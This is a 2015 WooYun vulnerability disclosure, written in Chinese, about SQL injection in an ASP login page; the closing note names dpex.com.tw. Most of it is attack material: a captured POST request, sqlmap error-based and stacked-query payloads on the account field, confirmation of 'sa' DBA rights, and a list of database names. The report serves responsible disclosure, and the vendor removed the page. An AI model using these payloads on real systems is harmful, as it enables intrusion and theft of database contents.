乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
站点登入处抓包
http://**.**.**.**/login.asp
post包
POST /log.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/login.aspCookie: ASPSESSIONIDCCRSSDCD=BIOKHMPCEFOKONBNKHKIHOOLConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 56account=15068712139&password=1&Submit=%E7%99%BB%E5%85%A5
Place: POSTParameter: account Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: account=15068712139' AND 3966=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(98)+CHAR(110)+CHAR(58)+(SELECT (CASE WHEN (3966=3966) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(104)+CHAR(101)+CHAR(119)+CHAR(58))) AND 'dXin'='dXin&password=1&Submit=?? Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: account=15068712139'; WAITFOR DELAY '0:0:5';-- AND 'HBTa'='HBTa&password=1&Submit=??---[10:36:36] [INFO] testing Microsoft SQL Server[10:36:36] [INFO] confirming Microsoft SQL Server[10:36:37] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[10:36:37] [INFO] fetching current user[10:36:37] [INFO] retrieved: sacurrent user: 'sa'
确定是DBA权限
[10:39:16] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[10:39:16] [INFO] testing if current user is DBA[10:39:16] [INFO] retrieved: 1current user is DBA: 'True'
涉及12个数据库
available databases [12]:[*] DPEXBOHQ[*] DPEXEXTBILL[*] DPEXWEB[*] master[*] model[*] msdb[*] MSDPEX95[*] MSDPEX97[*] MSOPS[*] Northwind[*] pubs[*] tempdb
waf
危害等级:高
漏洞Rank:18
确认时间:2015-10-13 14:02
感謝通報
2015-11-27:http://www.dpex.com.tw/login.asp 已刪除